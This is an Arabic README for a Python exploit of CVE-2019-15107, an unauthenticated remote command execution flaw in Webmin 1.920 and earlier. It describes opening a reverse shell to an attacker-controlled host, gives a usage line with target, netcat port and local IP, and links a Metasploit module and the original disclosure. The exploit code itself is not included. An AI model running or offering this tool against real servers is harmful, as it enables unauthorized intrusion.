
# استغلال Python لـ CVE-2019-15107 يستهدف تنفيذ الأوامر عن بُعد غير المصادق عليه في Webmin <= 1.920. يوفر قشرة عكسية إلى مضيف يتحكم به المهاجم.
الاستغلال الخاص بـ CVE-2019-15107 webmin <= webmin 1.920 لتنفيذ الأوامر عن بُعد دون مصادقة، مكتوب بلغة بايثون.
يمكن تشغيله باستخدام
python exploit.py <host to attack> <port to nc to> <local ip>
استنادًا إلى وحدة Metasploit https://www.exploit-db.com/exploits/47230
الإشعار الأصلي: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html